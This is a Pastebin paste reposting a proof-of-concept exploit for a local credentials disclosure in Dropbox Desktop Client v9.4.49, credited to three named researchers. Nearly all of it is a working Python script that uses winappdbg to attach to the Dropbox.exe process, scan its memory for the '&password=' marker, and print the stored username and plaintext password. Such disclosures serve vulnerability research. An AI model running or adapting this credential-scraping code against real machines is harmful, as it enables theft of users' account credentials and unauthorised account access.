API tools faq
paste
Advertisement
Guest User

Dropbox vuln

a guest
Mar 2nd, 2018
156
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.42 KB | None | 0 0
raw download clone embed print report
  1.  
  2. #####
  3. # Dropbox Desktop Client v9.4.49 (64bit) Local Credentials Disclosure
  4. # Tested on Windows Windows Server 2012 R2 64bit, English
  5. # Vendor Homepage @ https://www.dropbox.com
  6. # Date 06/09/2016
  7. # Bug Discovery by:
  8. #
  9. # Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
  10. # http://www.black-rose.ml
  11. #
  12. # Viktor Minin (https://www.linkedin.com/in/MininViktor)
  13. # https://1-33-7.com/
  14. #
  15. # Alexander Korznikov (https://www.linkedin.com/in/nopernik)
  16. # http://korznikov.com/
  17. #
  18. #####
  19. # Dropbox Desktop Client v9.4.49 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
  20. # A potential attacker could reveal the supplied username and password in order to gain access to account.
  21. #####
  22. # Proof-Of-Concept Code:
  23.  
  24. import time
  25. import urllib
  26. from winappdbg import Debug, Process
  27.  
  28. username = ''
  29. password = ''
  30. found = 0
  31. filename = "Dropbox.exe"
  32. process_pid = 0
  33. memory_dump = []
  34.  
  35. debug = Debug()
  36. try:
  37. print "[~] Searching for pid by process name '%s'.." % (filename)
  38. time.sleep(1)
  39. debug.system.scan_processes()
  40. for (process, process_name) in debug.system.find_processes_by_filename(filename):
  41. process_pid = process.get_pid()
  42. if process_pid is not 0:
  43. print "[+] Found process with pid #%d" % (process_pid)
  44. time.sleep(1)
  45. print "[~] Trying to read memory for pid #%d" % (process_pid)
  46.  
  47. process = Process(process_pid)
  48. for address in process.search_bytes('\x26\x70\x61\x73\x73\x77\x6F\x72\x64\x3D'):
  49. memory_dump.append(process.read(address,100))
  50. for i in range(len(memory_dump)):
  51. email_addr = memory_dump[i].split('email=')[1]
  52. tmp_passwd = memory_dump[i].split('password=')[1]
  53. username = email_addr.split('\x00')[0]
  54. password = tmp_passwd.split('&is_sso_link=')[0]
  55. if username != '' and password !='':
  56. found = 1
  57. print "[+] Credentials found!\r\n----------------------------------------"
  58. print "[+] Username: %s" % urllib.unquote_plus(username)
  59. print "[+] Password: %s" % password
  60. if found == 0:
  61. print "[-] Credentials not found! Make sure the client is connected."
  62. else:
  63. print "[-] No process found with name '%s'." % (filename)
  64.  
  65. debug.loop()
  66. finally:
  67. debug.stop()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!